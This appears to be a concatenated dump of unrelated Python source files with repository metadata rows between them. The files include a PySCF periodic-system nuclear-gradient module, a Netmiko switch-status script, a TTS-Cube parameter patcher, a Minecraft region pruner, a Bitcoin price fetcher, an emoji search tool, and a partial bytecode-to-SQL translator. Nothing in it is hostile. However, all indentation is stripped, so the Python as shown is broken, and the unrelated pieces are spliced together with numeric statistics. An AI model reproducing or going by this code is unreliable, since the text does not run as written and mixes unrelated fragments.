hcore[:,kn,:,p0:p1] -= h1[kn,:,p0:p1].transpose(0,2,1).conj()
return hcore
return hcore_deriv
def grad_nuc(cell, atmlst):
'''
Derivatives of nuclear repulsion energy wrt nuclear coordinates
'''
ew_eta = cell.get_ewald_params()[0]
chargs = cell.atom_charges()
coords = cell.atom_coords()
Lall = cell.get_lattice_Ls()
natom = len(chargs)
ewovrl_grad = np.zeros([natom,3])
for i, qi in enumerate(chargs):
ri = coords[i]
for j in range(natom):
if j == i:
continue
qj = chargs[j]
rj = coords[j]
r1 = ri-rj + Lall
r = np.sqrt(np.einsum('ji,ji->j', r1, r1))
r = r.reshape(len(r),1)
ewovrl_grad[i] += np.sum(- (qi * qj / r ** 3 * r1 *
scipy.special.erfc(ew_eta * r).reshape(len(r),1)), axis = 0)
ewovrl_grad[i] += np.sum(- qi * qj / r ** 2 * r1 * 2 * ew_eta / np.sqrt(np.pi) *
np.exp(-ew_eta**2 * r ** 2).reshape(len(r),1), axis = 0)
mesh = gto.cell._cut_mesh_for_ewald(cell, cell.mesh)
Gv, Gvbase, weights = cell.get_Gv_weights(mesh)
absG2 = np.einsum('gi,gi->g', Gv, Gv)
absG2[absG2==0] = 1e200
ewg_grad = np.zeros([natom,3])
SI = cell.get_SI(Gv)
if cell.low_dim_ft_type is None or cell.dimension == 3:
coulG = 4*np.pi / absG2
coulG *= weights
ZSI = np.einsum("i,ij->j", chargs, SI)
ZexpG2 = coulG * np.exp(-absG2/(4*ew_eta**2))
ZexpG2_mod = ZexpG2.reshape(len(ZexpG2),1) * Gv
for i, qi in enumerate(chargs):
Zfac = np.imag(ZSI * SI[i].conj()) * qi
ewg_grad[i] = - np.sum(Zfac.reshape((len(Zfac),1)) * ZexpG2_mod, axis = 0)
ew_grad = ewg_grad + ewovrl_grad
if atmlst is not None:
ew_grad = ew_grad[atmlst]
return ew_grad
def get_jk(mf_grad, dm, kpts):
'''J = ((-nabla i) j| kl) D_lk
K = ((-nabla i) j| kl) D_jk
'''
vj, vk = mf_grad.get_jk(dm, kpts)
return vj, vk
def get_j(mf_grad, dm, kpts):
return mf_grad.get_j(dm, kpts)
def get_k(mf_grad, dm, kpts):
return mf_grad.get_k(dm, kpts)
def get_veff(mf_grad, dm, kpts):
'''NR Hartree-Fock Coulomb repulsion'''
vj, vk = mf_grad.get_jk(dm, kpts)
return vj - vk * .5
def make_rdm1e(mo_energy, mo_coeff, mo_occ):
'''Energy weighted density matrix'''
nkpts = len(mo_occ)
dm1e = [molgrad.make_rdm1e(mo_energy[k], mo_coeff[k], mo_occ[k]) for k in range(nkpts)]
return np.asarray(dm1e)
class GradientsMixin(molgrad.GradientsMixin):
'''
Basic nuclear gradient functions for non-relativistic methods
'''
def __init__(self, method):
self.cell = method.cell
self.kpts = method.kpts
molgrad.GradientsMixin.__init__(self, method)
def get_hcore(self, cell=None, kpts=None):
if cell is None: cell = self.cell
if kpts is None: kpts = self.kpts
return get_hcore(cell, kpts)
hcore_generator = hcore_generator
def get_ovlp(self, cell=None, kpts=None):
if cell is None: cell = self.cell
if kpts is None: kpts = self.kpts
return get_ovlp(cell, kpts)
def get_jk(self, dm=None, kpts=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
exxdiv = self.base.exxdiv
cpu0 = (logger.process_clock(), logger.perf_counter())
vj, vk = self.base.with_df.get_jk_e1(dm, kpts, exxdiv=exxdiv)
logger.timer(self, 'vj and vk', *cpu0)
return vj, vk
def get_j(self, dm=None, kpts=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
cpu0 = (logger.process_clock(), logger.perf_counter())
vj = self.base.with_df.get_j_e1(dm, kpts)
logger.timer(self, 'vj', *cpu0)
return vj
def get_k(self, dm=None, kpts=None, kpts_band=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
exxdiv = self.base.exxdiv
cpu0 = (logger.process_clock(), logger.perf_counter())
vk = self.base.with_df.get_k_e1(dm, kpts, kpts_band, exxdiv)
logger.timer(self, 'vk', *cpu0)
return vk
def grad_nuc(self, cell=None, atmlst=None):
if cell is None: cell = self.cell
return grad_nuc(cell, atmlst)
def as_scanner(mf_grad):
'''Generating a nuclear gradients scanner/solver (for geometry optimizer).
The returned solver is a function. This function requires one argument
"cell" as input and returns energy and first order nuclear derivatives.
The solver will automatically use the results of last calculation as the
initial guess of the new calculation. All parameters assigned in the
nuc-grad object and SCF object (DIIS, conv_tol, max_memory etc) are
automatically applied in the solver.
Note scanner has side effects. It may change many underlying objects
(_scf, with_df, with_x2c, ...) during calculation.
'''
if isinstance(mf_grad, lib.GradScanner):
return mf_grad
logger.info(mf_grad, 'Create scanner for %s', mf_grad.__class__)
class SCF_GradScanner(mf_grad.__class__, lib.GradScanner):
def __init__(self, g):
lib.GradScanner.__init__(self, g)
def __call__(self, cell_or_geom, **kwargs):
if isinstance(cell_or_geom, gto.Cell):
cell = cell_or_geom
else:
cell = self.cell.set_geom_(cell_or_geom, inplace=False)
mf_scanner = self.base
e_tot = mf_scanner(cell)
self.cell = cell
# If second integration grids are created for RKS and UKS
# gradients
if getattr(self, 'grids', None):
self.grids.reset(cell)
de = self.kernel(**kwargs)
return e_tot, de
return SCF_GradScanner(mf_grad)
class Gradients(GradientsMixin):
'''Non-relativistic restricted Hartree-Fock gradients'''
def get_veff(self, dm=None, kpts=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
return get_veff(self, dm, kpts)
def make_rdm1e(self, mo_energy=None, mo_coeff=None, mo_occ=None):
if mo_energy is None: mo_energy = self.base.mo_energy
if mo_coeff is None: mo_coeff = self.base.mo_coeff
if mo_occ is None: mo_occ = self.base.mo_occ
return make_rdm1e(mo_energy, mo_coeff, mo_occ)
def extra_force(self, atom_id, envs):
'''Hook for extra contributions in analytical gradients.
Contributions like the response of auxiliary basis in density fitting
method, the grid response in DFT numerical integration can be put in
this function.
'''
#1 force from exxdiv corrections when madelung constant has non-zero derivative
#2 DFT grid response
return 0
grad_elec = grad_elec
as_scanner = as_scanner
def _finalize(self):
if self.verbose >= logger.NOTE:
logger.note(self, '--------------- %s gradients ---------------',
self.base.__class__.__name__)
self._write(self.cell, self.de, self.atmlst)
logger.note(self, '----------------------------------------------')
def kernel(self, mo_energy=None, mo_coeff=None, mo_occ=None, atmlst=None):
cput0 = (logger.process_clock(), logger.perf_counter())
if mo_energy is None: mo_energy = self.base.mo_energy
if mo_coeff is None: mo_coeff = self.base.mo_coeff
if mo_occ is None: mo_occ = self.base.mo_occ
if atmlst is None:
atmlst = self.atmlst
else:
self.atmlst = atmlst
if self.verbose >= logger.INFO:
self.dump_flags()
de = self.grad_elec(mo_energy, mo_coeff, mo_occ, atmlst)
self.de = de + self.grad_nuc(atmlst=atmlst)
logger.timer(self, 'SCF gradients', *cput0)
self._finalize()
return self.de
if __name__=='__main__':
from pyscf.pbc import scf
cell = gto.Cell()
cell.atom = '''
He 0.0 0.0 0.0
He 1.0 1.1 1.2
'''
cell.basis = 'gth-dzv'
cell.a = np.eye(3) * 3
cell.unit='bohr'
cell.pseudo='gth-pade'
cell.verbose=4
cell.build()
nmp = [1,1,3]
kpts = cell.make_kpts(nmp)
kmf = scf.KRHF(cell, kpts, exxdiv=None)
kmf.kernel()
mygrad = Gradients(kmf)
grad = mygrad.kernel()
| 38.11804 | 100 | 0.577914 | 2,515 | 17,115 | 3.778926 | 0.185686 | 0.017045 | 0.007576 | 0.008838 | 0.327652 | 0.281776 | 0.233796 | 0.213594 | 0.166246 | 0.162879 | 0 | 0.01959 | 0.293135 | 17,115 | 448 | 101 | 38.203125 | 0.765994 | 0.132866 | 0 | 0.258824 | 0 | 0 | 0.040579 | 0.003143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079412 | false | 0 | 0.029412 | 0.008824 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8baab9f5c40481a95b8ff51403fe91d0a5257af | 980 | py | Python | show.py | OthmaneBlial/EtherChannel-using-Netmiko | 3a51a5148681178b441cc3587ad16419c330ec06 | [
"MIT"
] | 2 | 2017-09-11T14:28:15.000Z | 2018-01-07T17:36:32.000Z | show.py | OthmaneBlial/EtherChannel-using-Netmiko | 3a51a5148681178b441cc3587ad16419c330ec06 | [
"MIT"
] | null | null | null | show.py | OthmaneBlial/EtherChannel-using-Netmiko | 3a51a5148681178b441cc3587ad16419c330ec06 | [
"MIT"
] | null | null | null | from netmiko import ConnectHandler
import data
def message(msg):
print('\n\n'+80*'#')
print('\n\n' + 20*'#' +' '+ msg + ' '+ 20*'#' + '\n\n')
print(80*'#'+'\n\n')
def show_etherchannel_summary(SWITCHES):
idx = 0
for SWITCH in SWITCHES:
idx += 1
print(20*'*'+' Showing Etherchannel summary for SWITCH '+ str(idx) + ' ' + 20*'*')
net_connect = ConnectHandler(**SWITCH)
output = net_connect.send_command('sho etherchannel summary | begin Group')
print(output)
def show_int_trunk(SWITCHES):
idx = 0
for SWITCH in SWITCHES:
idx += 1
print(20*'*'+' Showing trunking interfaces for SWITCH '+ str(idx) + ' ' + 20*'*')
net_connect = ConnectHandler(**SWITCH)
output = net_connect.send_command('show int trunk')
print(output)
SWITCHES = [data.SW1, data.SW2, data.SW3, data.SW4]
message('Showing Etherchannel summary')
show_etherchannel_summary(SWITCHES)
message('Showing trunking interfaces')
show_int_trunk(SWITCHES) | 27.222222 | 85 | 0.657143 | 126 | 980 | 5 | 0.31746 | 0.150794 | 0.057143 | 0.098413 | 0.390476 | 0.390476 | 0.390476 | 0.390476 | 0.390476 | 0.390476 | 0 | 0.03 | 0.183673 | 980 | 36 | 86 | 27.222222 | 0.7575 | 0 | 0 | 0.37037 | 0 | 0 | 0.231501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.074074 | 0 | 0.185185 | 0.259259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c137fe879760785cd044287714b203b8302dae | 651 | py | Python | scripts/update_encoder.py | tiberiu44/TTS-Cube | e841c726268c2c4b01c5fb1306fb1f032ec02994 | [
"Apache-2.0"
] | 216 | 2018-07-23T07:55:49.000Z | 2022-01-08T19:15:02.000Z | scripts/update_encoder.py | CherokeeLanguage/TTS-Cube | 9bfd01067ee0ba68820dff9ff5c25c530477d2cd | [
"Apache-2.0"
] | 30 | 2018-08-02T11:04:41.000Z | 2022-03-11T23:31:31.000Z | scripts/update_encoder.py | CherokeeLanguage/TTS-Cube | 9bfd01067ee0ba68820dff9ff5c25c530477d2cd | [
"Apache-2.0"
] | 47 | 2018-07-22T06:02:19.000Z | 2021-01-19T12:46:08.000Z | f_in = open("data/models/rnn_encoder.network-backup", "r")
f_out = open("data/models/rnn_encoder.network", "w")
add_params = False
for line in f_in.readlines():
if not add_params:
if line == '#LookupParameter# /_2 {200,19} 60801 ZERO_GRAD\n':
line = '#LookupParameter# /_2 {200,20} 60801 ZERO_GRAD\n'
add_params = True
print("Found")
f_out.write(line)
else:
line = line[:-1]
f_out.write(line)
parts = line.split(' ')
for part in parts[-200:]:
f_out.write(' ' + part)
f_out.write('\n')
add_params = False
f_out.close()
f_in.close()
| 31 | 70 | 0.571429 | 93 | 651 | 3.795699 | 0.419355 | 0.067989 | 0.101983 | 0.096317 | 0.175637 | 0.175637 | 0 | 0 | 0 | 0 | 0 | 0.055319 | 0.278034 | 651 | 20 | 71 | 32.55 | 0.695745 | 0 | 0 | 0.2 | 0 | 0 | 0.270353 | 0.105991 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c3fb5a21bccf2394bb7aa867a5ba1f5a5864e9 | 502 | py | Python | hello/sys_do.py | Supremeyh/python | 062374bc7dc4bbb3f9b331d8c2ea0fb2d16d6d4c | [
"MIT"
] | null | null | null | hello/sys_do.py | Supremeyh/python | 062374bc7dc4bbb3f9b331d8c2ea0fb2d16d6d4c | [
"MIT"
] | null | null | null | hello/sys_do.py | Supremeyh/python | 062374bc7dc4bbb3f9b331d8c2ea0fb2d16d6d4c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module '
__author__ = 'sea' # 特殊变量
import sys
def test():
args = sys.argv
if len(args)==1:
print('hello, python')
elif len(args)==2:
print('hello, %s' % args[1]) # args[0]为第一个参数永远是该.py文件的名称
else:
print('too many arguments')
if __name__ == '__main__':
test()
# 当我们在命令行运行本sys模块文件时,Python解释器把一个特殊变量__name__置为__main__,
# 而如果在其他地方导入该sys模块时, if判断将失败.
# 因此,这种if测试可以让一个模块通过命令行运行时执行一些额外的代码,最常见的就是运行测试。 | 20.916667 | 64 | 0.641434 | 59 | 502 | 5.118644 | 0.745763 | 0.046358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015113 | 0.209163 | 502 | 24 | 65 | 20.916667 | 0.745592 | 0.434263 | 0 | 0 | 0 | 0 | 0.225256 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.153846 | 0.230769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c4b1f572f798f5bd93a8dac95f6dad0edd366a | 386 | py | Python | src/download_raw.py | aeturrell/example-reproducible-research | 4de882d1af05ade52e3991c1c4e1f939c9714f8f | [
"MIT"
] | null | null | null | src/download_raw.py | aeturrell/example-reproducible-research | 4de882d1af05ade52e3991c1c4e1f939c9714f8f | [
"MIT"
] | null | null | null | src/download_raw.py | aeturrell/example-reproducible-research | 4de882d1af05ade52e3991c1c4e1f939c9714f8f | [
"MIT"
] | null | null | null | """
This script downloads the data needed for analysis from the ONS
API. It uses series that are in the yaml config file.
"""
from pathlib import Path
import seaborn as sns
def get_and_save_raw_data():
""" Saves the raw data to disk.
"""
df = sns.load_dataset("car_crashes")
df.to_csv(Path("raw/raw_data.csv"))
if __name__ == "__main__":
get_and_save_raw_data()
| 21.444444 | 63 | 0.702073 | 64 | 386 | 3.921875 | 0.671875 | 0.111554 | 0.079681 | 0.103586 | 0.135458 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194301 | 386 | 17 | 64 | 22.705882 | 0.807074 | 0.388601 | 0 | 0 | 0 | 0 | 0.157658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c62df79850b9d4f8ad9635bcf8b64ccb6d7ece | 780 | py | Python | mcRegionPrune.py | daniel-widrick/mcRegionPrune | 1848998394710dfc17d3cd4c66e0c90fff84858a | [
"MIT"
] | 2 | 2021-10-30T23:23:38.000Z | 2021-10-31T14:30:59.000Z | mcRegionPrune.py | daniel-widrick/mcRegionPrune | 1848998394710dfc17d3cd4c66e0c90fff84858a | [
"MIT"
] | null | null | null | mcRegionPrune.py | daniel-widrick/mcRegionPrune | 1848998394710dfc17d3cd4c66e0c90fff84858a | [
"MIT"
] | null | null | null | import sys, os, argparse
def pruneWorld(path, keepRadius):
chunkRadius = int(keepRadius / 512)
chunkRadius += 1; #Conservative
regionFileList = os.listdir(path)
for regionFile in regionFileList:
parts = regionFile.split(".")
if regionFile.endswith(".mca"):
if abs(int(parts[1])) > chunkRadius or abs(int(parts[2])) > chunkRadius:
print(regionFile)
parser = argparse.ArgumentParser("Prune region files outside a given block radius")
parser.add_argument("-p","--path",required=True, help="Path to directory containing region files in world directory");
parser.add_argument("-b","--blocks",required=True, type=int, help="Block radius around 0,0 to keep");
args = parser.parse_args()
pruneWorld(args.path,args.blocks)
| 35.454545 | 118 | 0.69359 | 98 | 780 | 5.489796 | 0.561224 | 0.022305 | 0.040892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012403 | 0.173077 | 780 | 21 | 119 | 37.142857 | 0.821705 | 0.015385 | 0 | 0 | 0 | 0 | 0.209909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.133333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c7225c61cfcb629018a0e6b7d11b69cf9edcdc | 462 | py | Python | bitcoin-api-helper/btc_price.py | programmer-o/bitcoin-researh-for-python | 6a8fa1520ea8e4fb0aba0c93a2e45fa6ca7de9f2 | [
"MIT"
] | 2 | 2022-01-03T16:19:48.000Z | 2022-01-03T16:20:22.000Z | bitcoin-api-helper/btc_price.py | programmer-o/bitcoin-researh-for-python | 6a8fa1520ea8e4fb0aba0c93a2e45fa6ca7de9f2 | [
"MIT"
] | null | null | null | bitcoin-api-helper/btc_price.py | programmer-o/bitcoin-researh-for-python | 6a8fa1520ea8e4fb0aba0c93a2e45fa6ca7de9f2 | [
"MIT"
] | null | null | null | import requests
def get_current_btc_price(currency_id):
try:
url = 'https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=%s'%currency_id
response = requests.get(url)
if response.status_code == 200:
data = response.content.decode('UTF-8')
print(data)
return data
else:
return({'msg' : "Something wrong"})
except Exception as e:
print(e.message) | 27.176471 | 102 | 0.601732 | 57 | 462 | 4.754386 | 0.754386 | 0.073801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01506 | 0.281385 | 462 | 17 | 103 | 27.176471 | 0.801205 | 0 | 0 | 0 | 0 | 0.076923 | 0.209503 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.230769 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c738451bc403f27d4b67298bec3c0b1bd99e56 | 1,747 | py | Python | emoji.py | chenjiandongx/emoji.py | 8b0d9d6004a8191c73ca49b3211a7a04bb628321 | [
"MIT"
] | 7 | 2018-12-29T17:09:51.000Z | 2019-09-29T08:09:49.000Z | emoji.py | chenjiandongx/emoji.py | 8b0d9d6004a8191c73ca49b3211a7a04bb628321 | [
"MIT"
] | null | null | null | emoji.py | chenjiandongx/emoji.py | 8b0d9d6004a8191c73ca49b3211a7a04bb628321 | [
"MIT"
] | 1 | 2020-07-19T02:17:28.000Z | 2020-07-19T02:17:28.000Z | # coding=utf-8
import argparse
import json
import os
import pyperclip
from fuzzywuzzy import fuzz
from pick import pick
THRESHOLD = 80
VERSION = "0.1.0"
TITLE = "Emojis: Use arrow keys"
HERE = os.path.join(
os.path.abspath(os.path.dirname(__file__)), "emojilib")
with open(os.path.join(HERE, "emojis.json"), "r", encoding="utf-8") as f:
emojis = json.load(f)
def get_parser():
"""
解析命令行参数
"""
parser = argparse.ArgumentParser(description="Search emoji via command-line")
parser.add_argument(
"keyword", metavar="KEYWORD", type=str, nargs="*", help="emoji keyword"
)
parser.add_argument(
"-v",
"--version",
action="store_true",
help="displays the current version of emoji",
)
return parser
def command_line_runner():
"""
执行命令行操作
"""
parser = get_parser()
args = vars(parser.parse_args())
if args["version"]:
print("emoji", VERSION)
return
if len(args["keyword"]) == 0:
parser.print_help()
return
keyword = args["keyword"][0]
if not keyword:
parser.print_help()
return
query_emoji(keyword)
def query_emoji(keyword):
"""
查询 emoji 表情
"""
opts = list()
for key, value in emojis.items():
for v in value.get("keywords"):
if fuzz.ratio(v, keyword) > THRESHOLD:
opts.append(value.get("char"))
if len(opts) == 0:
print("Sorry, nothing found!")
return
opt, index = pick(opts, TITLE, indicator="=>")
pyperclip.copy(opt)
print("Copied", opt)
if __name__ == "__main__":
command_line_runner()
| 20.552941 | 82 | 0.564969 | 204 | 1,747 | 4.710784 | 0.47549 | 0.024974 | 0.020812 | 0.043704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008177 | 0.299943 | 1,747 | 84 | 83 | 20.797619 | 0.777596 | 0.023469 | 0 | 0.150943 | 0 | 0 | 0.153553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.113208 | 0 | 0.264151 | 0.09434 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c777be4500b793f6ba38c1d1130ee7f99e8613 | 21,570 | py | Python | ck/query/sql.py | hczhcz/PyCK | 6a635c0bd911bef413400ae348e38ea5e85c4e6b | [
"MIT"
] | 3 | 2020-03-19T10:10:20.000Z | 2020-12-26T10:53:37.000Z | ck/query/sql.py | hczhcz/PyCK | 6a635c0bd911bef413400ae348e38ea5e85c4e6b | [
"MIT"
] | null | null | null | ck/query/sql.py | hczhcz/PyCK | 6a635c0bd911bef413400ae348e38ea5e85c4e6b | [
"MIT"
] | 3 | 2020-11-05T02:42:38.000Z | 2021-03-24T06:39:41.000Z | import dis
import functools
import inspect
import types
import typing
from ck import exception
from ck.query import ast
def _run(
global_dict: typing.Dict[str, typing.Any],
local_dict: typing.Dict[str, typing.Any],
# TODO: use types.CellType
cells: typing.Tuple[typing.Any, ...],
stack: typing.List[typing.Any],
opname: str,
# TODO: int?
arg: typing.Any,
argval: typing.Any
) -> bool:
# TODO
# pylint: disable=trailing-comma-tuple
def call_named(
name: str,
*args: typing.Any
) -> ast.BaseAST:
return ast.Call(ast.Raw(name), *args)
if opname == 'NOP':
pass
elif opname == 'POP_TOP':
stack.pop()
elif opname == 'ROT_TWO':
stack[-2:] = stack[-1], stack[-2]
elif opname == 'ROT_THREE':
stack[-3:] = stack[-1], *stack[-3:-1]
elif opname == 'ROT_FOUR':
stack[-4:] = stack[-1], *stack[-4:-1]
elif opname == 'DUP_TOP':
stack.append(stack[-1])
elif opname == 'DUP_TOP_TWO':
stack.extend(stack[-2:])
elif opname == 'UNARY_POSITIVE':
stack[-1] = call_named('negate', call_named('negate', stack[-1]))
elif opname == 'UNARY_NEGATIVE':
stack[-1] = call_named('negate', stack[-1])
elif opname == 'UNARY_NOT':
stack[-1] = call_named('not', stack[-1])
elif opname == 'UNARY_INVERT':
stack[-1] = call_named('bitNot', stack[-1])
elif opname == 'GET_ITER':
stack[-1] = iter(stack[-1])
elif opname == 'GET_YIELD_FROM_ITER':
# TODO: more accurate semantic
stack[-1] = iter(stack[-1])
elif opname == 'BINARY_POWER':
stack[-2:] = call_named('pow', *stack[-2:]),
elif opname == 'BINARY_MULTIPLY':
stack[-2:] = call_named('multiply', *stack[-2:]),
elif opname == 'BINARY_MATRIX_MULTIPLY':
stack[-2:] = call_named('cast', *stack[-2:]),
elif opname == 'BINARY_FLOOR_DIVIDE':
stack[-2:] = call_named('intDiv', *stack[-2:]),
elif opname == 'BINARY_TRUE_DIVIDE':
stack[-2:] = call_named('divide', *stack[-2:]),
elif opname == 'BINARY_MODULO':
stack[-2:] = call_named('modulo', *stack[-2:]),
elif opname == 'BINARY_ADD':
stack[-2:] = call_named('plus', *stack[-2:]),
elif opname == 'BINARY_SUBTRACT':
stack[-2:] = call_named('minus', *stack[-2:]),
elif opname == 'BINARY_SUBSCR':
# TODO: subscr for slices?
# TODO: general element access for array, tuple, and string?
stack[-2:] = call_named('arrayElement', *stack[-2:]),
elif opname == 'BINARY_LSHIFT':
stack[-2:] = call_named('bitShiftLeft', *stack[-2:]),
elif opname == 'BINARY_RSHIFT':
stack[-2:] = call_named('bitShiftRight', *stack[-2:]),
elif opname == 'BINARY_AND':
stack[-2:] = call_named('bitAnd', *stack[-2:]),
elif opname == 'BINARY_XOR':
stack[-2:] = call_named('bitXor', *stack[-2:]),
elif opname == 'BINARY_OR':
stack[-2:] = call_named('bitOr', *stack[-2:]),
elif opname == 'INPLACE_POWER':
stack[-2:] = call_named('pow', *stack[-2:]),
elif opname == 'INPLACE_MULTIPLY':
stack[-2:] = call_named('multiply', *stack[-2:]),
elif opname == 'INPLACE_MATRIX_MULTIPLY':
stack[-2:] = call_named('cast', *stack[-2:]),
elif opname == 'INPLACE_FLOOR_DIVIDE':
stack[-2:] = call_named('intDiv', *stack[-2:]),
elif opname == 'INPLACE_TRUE_DIVIDE':
stack[-2:] = call_named('divide', *stack[-2:]),
elif opname == 'INPLACE_MODULO':
stack[-2:] = call_named('modulo', *stack[-2:]),
elif opname == 'INPLACE_ADD':
stack[-2:] = call_named('plus', *stack[-2:]),
elif opname == 'INPLACE_SUBTRACT':
stack[-2:] = call_named('minus', *stack[-2:]),
elif opname == 'INPLACE_LSHIFT':
stack[-2:] = call_named('bitShiftLeft', *stack[-2:]),
elif opname == 'INPLACE_RSHIFT':
stack[-2:] = call_named('bitShiftRight', *stack[-2:]),
elif opname == 'INPLACE_AND':
stack[-2:] = call_named('bitAnd', *stack[-2:]),
elif opname == 'INPLACE_XOR':
stack[-2:] = call_named('bitXor', *stack[-2:]),
elif opname == 'INPLACE_OR':
stack[-2:] = call_named('bitOr', *stack[-2:]),
elif opname == 'STORE_SUBSCR':
stack[-3:] = call_named(
'arrayConcat',
call_named(
'arraySlice',
stack[-2],
1,
call_named('minus', stack[-1], 1)
),
call_named('array', stack[-3]),
call_named(
'arraySlice',
stack[-2],
call_named('plus', stack[-1], 1)
)
),
elif opname == 'DELETE_SUBSCR':
stack[-2:] = call_named(
'arrayConcat',
call_named(
'arraySlice',
stack[-2],
1,
call_named('minus', stack[-1], 1)
),
call_named(
'arraySlice',
stack[-2],
call_named('plus', stack[-1], 1)
)
),
elif opname == 'GET_AWAITABLE':
raise exception.DisError(opname)
elif opname == 'GET_AITER':
raise exception.DisError(opname)
elif opname == 'GET_ANEXT':
raise exception.DisError(opname)
elif opname == 'END_ASYNC_FOR':
raise exception.DisError(opname)
elif opname == 'BEFORE_ASYNC_WITH':
raise exception.DisError(opname)
elif opname == 'SETUP_ASYNC_WITH':
raise exception.DisError(opname)
elif opname == 'PRINT_EXPR':
print(stack.pop())
elif opname == 'SET_ADD':
value = stack.pop()
stack[-arg].add(value)
elif opname == 'LIST_APPEND':
value = stack.pop()
stack[-arg].append(value)
elif opname == 'MAP_ADD':
name, value = stack[-2:]
del stack[-2:]
stack[-arg][name] = value
elif opname == 'RETURN_VALUE':
return True
elif opname == 'YIELD_VALUE':
raise exception.DisError(opname)
elif opname == 'YIELD_FROM':
raise exception.DisError(opname)
elif opname == 'SETUP_ANNOTATIONS':
if '__annotations__' not in local_dict:
local_dict['__annotations__'] = {}
elif opname == 'IMPORT_STAR':
module = stack.pop()
local_dict.update({
name: getattr(module, name)
for name in dir(module)
if not name.startswith('_')
})
elif opname == 'POP_BLOCK':
raise exception.DisError(opname)
elif opname == 'POP_EXCEPT':
raise exception.DisError(opname)
elif opname == 'POP_FINALLY':
raise exception.DisError(opname)
elif opname == 'BEGIN_FINALLY':
raise exception.DisError(opname)
elif opname == 'END_FINALLY':
raise exception.DisError(opname)
elif opname == 'LOAD_BUILD_CLASS':
stack.append(__build_class__) # type: ignore[name-defined]
elif opname == 'SETUP_WITH':
raise exception.DisError(opname)
elif opname == 'WITH_CLEANUP_START':
raise exception.DisError(opname)
elif opname == 'WITH_CLEANUP_FINISH':
raise exception.DisError(opname)
elif opname == 'STORE_NAME':
local_dict[argval] = stack.pop()
elif opname == 'DELETE_NAME':
del local_dict[argval]
elif opname == 'UNPACK_SEQUENCE':
if len(stack[-1]) != arg:
raise ValueError()
stack[-1:] = stack[-1][::-1]
elif opname == 'UNPACK_EX':
lo = arg % 256 # pylint: disable=invalid-name
hi = arg // 256 # pylint: disable=invalid-name
if hi:
stack[-1:] = *stack[-1][:lo], stack[-1][lo:-hi], *stack[-1][-hi:]
else:
stack[-1:] = *stack[-1][:lo], stack[-1][lo:]
elif opname == 'STORE_ATTR':
# TODO
